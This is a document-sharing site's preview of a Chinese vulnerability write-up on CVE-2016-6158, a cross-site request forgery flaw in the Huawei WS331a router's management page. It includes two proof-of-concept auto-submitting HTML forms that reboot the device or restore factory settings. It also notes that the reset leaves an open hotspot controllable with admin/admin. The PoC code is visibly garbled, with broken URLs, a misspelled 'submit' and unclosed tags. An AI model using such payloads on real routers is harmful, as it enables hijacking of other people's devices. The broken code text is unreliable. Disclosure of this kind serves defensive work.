(CVE-2016-6158)华为WS331a产品管理页面存在CSRF漏洞.docx
-
资源ID:496998
资源大小:6.58KB
- 资源格式: DOCX
下载积分:3金币
快捷下载

账号登录下载
微信登录下载
三方登录下载:
友情提示
2、PDF文件下载后,可能会被浏览器默认打开,此种情况可以点击浏览器菜单,保存网页到桌面,就可以正常下载了。
3、本站不支持迅雷下载,请使用电脑自带的IE浏览器,或者360浏览器、谷歌浏览器下载即可。
4、本站资源下载后的文档和图纸-无水印,预览文档经过压缩,下载后原文更清晰。
5、试题试卷类文档,如果标题没有明确说明有答案则都视为没有答案,请知晓。
|
(CVE-2016-6158)华为WS331a产品管理页面存在CSRF漏洞.docx
(CVE-2016-6158)华为WS331a产品管理页面存在CSRF漏洞一、漏洞简介HUaWeiWS331a是中国华为(Huawei)公司的一款迷你无线路由器。使用 WS331a-10V100R001C01B112之前版本软件的HuaweiWS331a路由器的管理界 面存在跨站请求伪造漏洞。远程攻击者可通过提交特制的请求利用该漏洞恢复出厂 设置或重启设备。二、漏洞影响WS331a-10 V100R001C02B017SP01 及之前版本三、复现过程POC实现代码如下:当管理员登陆后,打开如下PoC页面,WS331a设备将重启。<form action=http:/192.168.3.1/api/service/reboot.cgi,' method="post> <form><script> document.forms0.sbmit(); <script>当管理员登陆后,打开如下PoC页面,WS331a设备将恢复初始化配置。设备自动重启后不需要密码即可连接热点,并使用amdin/admin对设备 进行管理控制。<form action="http:/192.168.3.l/api/service/restoredefcfg.cgi" method= "post',><form><script> document.forms0.submit(); <script>